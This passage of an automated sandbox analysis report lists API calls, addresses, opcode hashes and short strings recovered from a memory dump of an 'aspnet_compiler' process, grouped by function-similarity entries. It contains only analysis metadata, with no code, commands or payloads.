                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2903831945-0
                                                                                                                                                                                                                                                                  • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                                                                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$??3@
                                                                                                                                                                                                                                                                  • String ID: g4@
                                                                                                                                                                                                                                                                  • API String ID: 3314356048-2133833424
                                                                                                                                                                                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                                                                                                                                                                  • String ID: @@@@$History
                                                                                                                                                                                                                                                                  • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                                                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                                                  • String ID: edit
                                                                                                                                                                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                                                  • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                                                  • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                                                                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                                                  Memory Dump Source
